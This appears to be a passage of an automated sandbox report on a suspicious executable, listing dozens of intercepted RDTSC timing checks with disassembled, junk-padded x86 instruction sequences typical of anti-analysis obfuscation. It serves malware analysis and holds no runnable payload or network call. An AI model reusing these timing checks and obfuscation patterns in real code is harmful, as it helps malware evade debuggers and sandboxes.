                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C4FE9 second address: 8C4FEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C7EB0 second address: 8C7EBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C7EBE second address: 8C7EC8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F98219BDB66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C7EC8 second address: 8C7ECE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C7ECE second address: 8C7EE4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F98219BDB66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C7EE4 second address: 8C7EE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C7EE8 second address: 8C7EEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C7EEE second address: 8C7F06 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9820CD6B98h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jc 00007F9820CD6BA4h 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C7F93 second address: 8C7FF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F98219BDB66h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jno 00007F98219BDB66h 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 jno 00007F98219BDB70h 0x0000001d mov eax, dword ptr [esp+04h] 0x00000021 push esi 0x00000022 jmp 00007F98219BDB75h 0x00000027 pop esi 0x00000028 mov eax, dword ptr [eax] 0x0000002a jns 00007F98219BDB76h 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C7FF7 second address: 8C7FFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C7FFB second address: 8C800C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98219BDB6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C800C second address: 8C8012 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8012 second address: 8C8057 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98219BDB6Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c mov edx, dword ptr [ebp+122D2C77h] 0x00000012 mov dword ptr [ebp+122D2FEEh], edi 0x00000018 push 00000003h 0x0000001a or dword ptr [ebp+122D1809h], esi 0x00000020 push 00000000h 0x00000022 xor dword ptr [ebp+122D1BD3h], edx 0x00000028 push 00000003h 0x0000002a mov edi, dword ptr [ebp+122D2C2Fh] 0x00000030 push 40A0BF69h 0x00000035 pushad 0x00000036 jg 00007F98219BDB6Ch 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8057 second address: 8C805F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C805F second address: 8C8063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8174 second address: 8C81D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 xor dword ptr [esp], 11A90114h 0x0000000e add dh, 00000046h 0x00000011 mov cx, 985Eh 0x00000015 lea ebx, dword ptr [ebp+12449DC0h] 0x0000001b push 00000000h 0x0000001d push esi 0x0000001e call 00007F9820CD6B98h 0x00000023 pop esi 0x00000024 mov dword ptr [esp+04h], esi 0x00000028 add dword ptr [esp+04h], 00000016h 0x00000030 inc esi 0x00000031 push esi 0x00000032 ret 0x00000033 pop esi 0x00000034 ret 0x00000035 sbb cx, CB3Bh 0x0000003a mov ecx, eax 0x0000003c xchg eax, ebx 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F9820CD6BA8h 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C822F second address: 8C8239 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F98219BDB66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8239 second address: 8C823E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C823E second address: 8C82AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F98219BDB75h 0x0000000d nop 0x0000000e sbb dx, EC67h 0x00000013 mov dh, cl 0x00000015 push 00000000h 0x00000017 pushad 0x00000018 mov ah, dh 0x0000001a popad 0x0000001b call 00007F98219BDB69h 0x00000020 jnp 00007F98219BDB72h 0x00000026 jnl 00007F98219BDB6Ch 0x0000002c push eax 0x0000002d push ecx 0x0000002e jmp 00007F98219BDB74h 0x00000033 pop ecx 0x00000034 mov eax, dword ptr [esp+04h] 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b jl 00007F98219BDB66h 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C82AA second address: 8C82AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C82AF second address: 8C82D4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F98219BDB73h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 jns 00007F98219BDB66h 0x00000016 pop eax 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C82D4 second address: 8C82F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9820CD6BA0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C82F2 second address: 8C82FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C82FB second address: 8C82FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C82FF second address: 8C83A2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 mov di, BD05h 0x0000000c call 00007F98219BDB78h 0x00000011 sub dword ptr [ebp+122D1C27h], esi 0x00000017 pop edi 0x00000018 push 00000003h 0x0000001a mov esi, 0D4D026Fh 0x0000001f push 00000000h 0x00000021 push edx 0x00000022 jmp 00007F98219BDB6Eh 0x00000027 pop edi 0x00000028 mov esi, 1BB4697Fh 0x0000002d push 00000003h 0x0000002f push 00000000h 0x00000031 push edx 0x00000032 call 00007F98219BDB68h 0x00000037 pop edx 0x00000038 mov dword ptr [esp+04h], edx 0x0000003c add dword ptr [esp+04h], 00000019h 0x00000044 inc edx 0x00000045 push edx 0x00000046 ret 0x00000047 pop edx 0x00000048 ret 0x00000049 and si, 2E5Ah 0x0000004e mov dword ptr [ebp+122D1B37h], ebx 0x00000054 call 00007F98219BDB69h 0x00000059 push ebx 0x0000005a jg 00007F98219BDB72h 0x00000060 pop ebx 0x00000061 push eax 0x00000062 jng 00007F98219BDB78h 0x00000068 push eax 0x00000069 push edx 0x0000006a je 00007F98219BDB66h 0x00000070 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C83A2 second address: 8C83A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C83A6 second address: 8C83C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F98219BDB74h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C83C6 second address: 8C83CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C83CD second address: 8C8405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F98219BDB72h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F98219BDB76h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8405 second address: 8C8467 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F9820CD6B98h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 stc 0x00000023 jmp 00007F9820CD6BA8h 0x00000028 mov si, ED41h 0x0000002c lea ebx, dword ptr [ebp+12449DCBh] 0x00000032 or dword ptr [ebp+122D33A0h], edi 0x00000038 xchg eax, ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F9820CD6BA2h 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8467 second address: 8C8471 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F98219BDB66h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8471 second address: 8C8475 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8475 second address: 8C8488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F98219BDB68h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8488 second address: 8C848E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E70C7 second address: 8E70D3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E70D3 second address: 8E70EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jnc 00007F9820CD6B96h 0x00000013 je 00007F9820CD6B96h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7767 second address: 8E777D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98219BDB72h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E792D second address: 8E7931 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7931 second address: 8E793D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7A4F second address: 8E7A59 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9820CD6B96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7A59 second address: 8E7A75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop eax 0x0000000c jng 00007F98219BDB70h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7A75 second address: 8E7A91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9820CD6BA7h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7A91 second address: 8E7A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7A97 second address: 8E7A9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7B8D second address: 8E7B97 instructions: 0x00000000 rdtsc 0x00000002 je 00007F98219BDB66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7B97 second address: 8E7BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9820CD6B9Ah 0x0000000b jnc 00007F9820CD6B98h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jnp 00007F9820CD6BB3h 0x0000001a jmp 00007F9820CD6BA7h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7BD1 second address: 8E7BE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F98219BDB6Eh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7D2F second address: 8E7D45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9820CD6BA0h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7E80 second address: 8E7EA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98219BDB77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c jnc 00007F98219BDB66h 0x00000012 pop ecx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DD219 second address: 8DD251 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9820CD6B96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9820CD6BA9h 0x00000013 jmp 00007F9820CD6BA1h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E86F3 second address: 8E86FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E86FD second address: 8E870A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E8ACA second address: 8E8B0B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F98219BDB66h 0x00000008 jp 00007F98219BDB66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 jng 00007F98219BDB66h 0x00000019 push eax 0x0000001a pop eax 0x0000001b pop ebx 0x0000001c jnc 00007F98219BDB85h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BF220 second address: 8BF225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ED125 second address: 8ED12F instructions: 0x00000000 rdtsc 0x00000002 je 00007F98219BDB6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ED723 second address: 8ED729 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EC68B second address: 8EC69E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F98219BDB6Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F43A0 second address: 8F43BF instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9820CD6BB1h 0x00000008 jmp 00007F9820CD6BA5h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F43BF second address: 8F43D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F98219BDB86h 0x0000000c push eax 0x0000000d push edx 0x0000000e ja 00007F98219BDB66h 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F396A second address: 8F3976 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F9820CD6B96h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F3976 second address: 8F397C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F397C second address: 8F3985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F3985 second address: 8F3997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F3997 second address: 8F399B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F399B second address: 8F39A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F39A9 second address: 8F39B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9820CD6B9Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F39B8 second address: 8F39C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F98219BDB6Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F3AFE second address: 8F3B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F9820CD6B9Eh 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F407B second address: 8F4081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F4081 second address: 8F408D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F9820CD6BB1h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F4206 second address: 8F4231 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F98219BDB66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F98219BDB7Eh 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jmp 00007F98219BDB76h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F4231 second address: 8F4237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F50E6 second address: 8F50EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F517B second address: 8F51B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F9820CD6B9Ch 0x0000000d pop edx 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 pushad 0x00000013 push edi 0x00000014 jmp 00007F9820CD6B9Fh 0x00000019 pop edi 0x0000001a push ebx 0x0000001b pushad 0x0000001c popad 0x0000001d pop ebx 0x0000001e popad 0x0000001f mov eax, dword ptr [eax] 0x00000021 pushad 0x00000022 ja 00007F9820CD6B98h 0x00000028 push edi 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F51B8 second address: 8F5213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jmp 00007F98219BDB6Ah 0x0000000f pop eax 0x00000010 je 00007F98219BDB7Ch 0x00000016 jmp 00007F98219BDB76h 0x0000001b call 00007F98219BDB69h 0x00000020 push edi 0x00000021 jmp 00007F98219BDB6Bh 0x00000026 pop edi 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F98219BDB71h 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F5213 second address: 8F524D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F9820CD6B96h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jnc 00007F9820CD6B9Eh 0x00000018 mov eax, dword ptr [eax] 0x0000001a jno 00007F9820CD6B9Eh 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push ecx 0x00000027 push edi 0x00000028 pop edi 0x00000029 pop ecx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F53BF second address: 8F53C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F56FD second address: 8F5703 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
